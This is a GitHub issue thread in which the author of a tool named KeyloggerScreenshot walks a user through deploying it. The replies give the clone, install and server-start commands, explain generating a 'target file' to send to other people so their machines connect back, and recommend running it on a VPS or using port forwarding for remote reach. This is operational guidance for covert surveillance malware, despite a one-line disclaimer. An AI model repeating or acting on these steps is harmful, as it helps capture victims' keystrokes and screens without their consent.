KeyloggerScreenshot icon indicating copy to clipboard operation
KeyloggerScreenshot copied to clipboard

I need help

Open blackskidarch67 opened this issue 8 months ago • 8 comments

I need help learning how to use it please explain

blackskidarch67 avatar Apr 22 '25 03:04 blackskidarch67

First of all you will have to clone the project by typing

git clone https://github.com/Kill0geR/KeyloggerScreenshot.git

in your terminal.

Go into the program’s folder You type:

cd KeyloggerScreenshot

Install what it needs You type:

python requirements.py

Tell the program where to send the info You type something like:

python KLS_start.py -aip 127.0.0.1 -cf

Change 127.0.0.1 to your ip-address for example (192.168.0.10). You will find the ip address by typing: ipconfig on windows and ifconfig or ip a on linux

-cf creates a target file which you can send to others. They can know run the script and will be connected with the server

NOTE

If you send the created script to others your terminal where python KLS_start.py -aip 127.0.0.1 -cf should still be running. If you want to run it later you must include "-ds" in your terminal. This creates a server that is connected with the target file.

This only works internally when you want to use your own computer. The true power unfolds if you run KeyloggerScreenshot on a vps server.

PLEASE DO NOT USE KeyloggerScreenshot TO HARM OTHERS

Hope this helps

Kill0geR avatar Apr 22 '25 07:04 Kill0geR

Like my public ip or private, also what does git clone do?

blackskidarch67 avatar Apr 22 '25 17:04 blackskidarch67

Also when I run the KLS_start it says "invalid sequence 29 " something like that

blackskidarch67 avatar Apr 22 '25 17:04 blackskidarch67

You should use your private ip. If you want to use your public ip you have to install port forwarding on your home router

Kill0geR avatar Apr 22 '25 18:04 Kill0geR

Also when I run the KLS_start it says "invalid sequence 29 " something like that

Can you send me an image of the error

Kill0geR avatar Apr 22 '25 19:04 Kill0geR

i cant send a photo but it has something to do with the \ maybe you did the gui wrong

blackskidarch67 avatar Apr 23 '25 06:04 blackskidarch67

Did you fix it?

blackskidarch67 avatar Apr 27 '25 01:04 blackskidarch67

Tbh I still haven't found the issue. It works on all machines that I have tried.

Kill0geR avatar Apr 28 '25 15:04 Kill0geR